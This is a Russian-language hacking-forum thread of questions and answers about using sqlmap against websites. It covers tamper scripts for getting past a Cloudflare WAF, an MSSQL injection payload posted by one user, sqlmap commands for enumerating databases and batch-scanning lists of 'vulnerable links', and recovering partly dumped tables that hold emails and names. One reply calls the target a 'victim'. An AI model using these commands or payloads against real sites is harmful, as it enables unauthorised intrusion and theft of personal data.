Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    815
    Reputations:
    90
    значение суфикса аномальное, о чем я уже отписался выше. "вопрос про его использование в контекста самого языка MySQL" его используют чтобы кастомезировать выборку из базы, прикрутить лимит или какое то неординарное условие. по факту --suffix просто добавляет строку в конец запроса, о чем собственно сообщил BigBear
     
    _________________________
  2. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Приветствую, как вы пришли к решению включить именно этот тампер?
     
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Спасибо, этот тампер помог слепую раскрутить, версию определяло, а дальше не шло дело, подрубил этот тампер и сразу всё раскрутило.
     
  4. 717u717

    717u717 New Member

    Joined:
    16 Dec 2015
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Всем привет.
    Выдало такие данные, можно ли тут что нибудь сделать?
    [11:47:24] [INFO] testing connection to the target URL
    [11:47:24] [WARNING] potential permission problems detected ('Access denied')
    [11:47:24] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
    [11:47:24] [INFO] checking if the target is protected by some kind of WAF/IPS
    [11:47:24] [INFO] heuristics detected web page charset 'ascii'
    [11:47:24] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
    do you want sqlmap to try to detect backend WAF/IPS? [y/N] y
    [11:51:05] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
    [11:51:06] [INFO] using WAF scripts to detect backend WAF/IPS protection
    [11:51:26] [CRITICAL] WAF/IPS identified as 'CloudFlare Web Application Firewall (CloudFlare)'
    are you sure that you want to continue with further target testing? [y/N] y
    [11:56:24] [WARNING] please consider usage of tamper scripts (option '--tamper')
    [11:56:24] [INFO] testing if the target URL content is stable
    [11:56:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
     
  5. 717u717

    717u717 New Member

    Joined:
    16 Dec 2015
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    я в этом деле новичок, не подскажешь конкретно что это и что с этим можно сделать?
    Изменяюсь за нубские вопросы.
     
  6. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    352
    Likes Received:
    221
    Reputations:
    2
    Там же написано, .use different tamper scripts, пробуй тампер скрипты, в мапе они есть , как пользльзоватся гугли
     
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Оставь всё как есть только теперь добавь --tamper=unionalltounion
    и отпиши
     
  8. 717u717

    717u717 New Member

    Joined:
    16 Dec 2015
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    [13:58:06] [INFO] loading tamper module 'unionalltounion'
    [13:58:07] [INFO] testing connection to the target URL
    [13:58:07] [WARNING] potential permission problems detected ('Access denied')
    [13:58:07] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
    [13:58:07] [INFO] testing if the target URL content is stable
    [13:58:08] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
    how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    CloudFlare tamper скриптами из коробки не обходится, а то я смотрю Вам тут насоветовали.

    Если этот ресурс Вам встал по перёк горла и кровь из носу нужно достать данные из Базы Данных, то почитайте не как пользоваться SQLmap и передавать все подряд команды скрипту в надежде на успех. А как руками раскручивать инъекции в БД, после откройте еще раз поисковик google и прочтите как обходят WAF и примените советы из этих статей на своей жертве. Если после всех манипуляций у Вас ничего не выйдет, то у нас на форуме есть тема "Вопросы по уязвимостям", обращайтесь туда с запросом и что и как выделали и что не получается!
     
    b3, panic.ker and crlf like this.
  10. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    Естественно не обходится, 1е это обычные паблик скрипты, 2е в CloudFlare явно работают люди у которых эти скрипты в первую очередь забанены.
     
  11. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
    Ставил -v3, в результате чего были видны запросы, который шлет Sqlmap - unionalltounion.py заменяет UNION ALL SELECT на UNION SELECT, это как раз те самые запросы в БД, когда вытягиваешь списки чего-либо, но даже если это не поможет в другом случае, то есть смысл использовать этот тампер в сопряжении с еще каким-нибудь, либо вообще другие пробовать. Так или иначе нужно вначале смотреть какой тип SQL и что конкретно фильтруется
     
  12. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
    --where=DUMPWHERE Использовать условие WHERE при дампинге таблиц , это даже в мануале написано , указываете значения параметров и все гуд
     
  13. Xrenovi4

    Xrenovi4 New Member

    Joined:
    12 Dec 2017
    Messages:
    20
    Likes Received:
    4
    Reputations:
    3
    Произошел обрыв сети и дамп прекратился без сохранения результатов.
    Подскажите, как из файла session.sqlite вытащить данные которые успело получить?
     
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    http://sqlitebrowser.org
     
    Xrenovi4 likes this.
  15. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    подскажите, есть txt файл с уязвмимыми ссылками, как скормить sqlmapу этот файл что бы проверял по очередности?
    СПС



    "sqlmap.py -m" нашел)
     
    #795 RWD, 4 Dec 2018
    Last edited: 4 Dec 2018
  16. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Подскажите, как правильно "скормить" ссылку в SQLMAP такого вида:
    GET /top-albums.asp?syears=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(80)%2bCHAR(50)%2bCHAR(65)%2bCHAR(89)%2bCHAR(86)%2bCHAR(66)%2bCHAR(99)%2bCHAR(121))%20FROM%20syscolumns)
     
  17. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    sqlmap -u "site/top-albums.asp?syears=" -p "syears" --dbs --random-agent
     
    vladF likes this.
  18. Xrenovi4

    Xrenovi4 New Member

    Joined:
    12 Dec 2017
    Messages:
    20
    Likes Received:
    4
    Reputations:
    3
    Не хочет распаршивать сайт и подключаться к нему
    Мап вообще не коннектится, первый раз такая хрень, хотя сайт работает. Подскажите как можно побороться

    Code:
    [15:18:07] [CRITICAL] unable to connect to the target URL ('??????????? ?? ???????????, ?.?. ???????? ????????? ?????? ?????? ?? ???????????'). sqlmap is going to retry the request(s)
    [15:18:07] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
    [15:18:11] [CRITICAL] unable to connect to the target URL ('??????????? ?? ???????????, ?.?. ???????? ????????? ?????? ?????? ?? ???????????')
     
  19. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    34
    Likes Received:
    2
    Reputations:
    0
    Подскажите. Вообщем дампится таблица, в колонке email, считал как emaiq (q - не подтвержденный символ)
    Соответственно эту колонку он вообще не сдампил, пропустил, так же еще одну last name извлек не корректно и пропустил.
    Что теперь можно сделать? Я так понял нельзя запустить на отдельную проверку не правильно извлеченных символов. Только запускать повторно?
     
  20. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    330
    Reputations:
    6
    Вроде скульмап больше не обновляетца, зачем вы его юзаете?
     
Loading...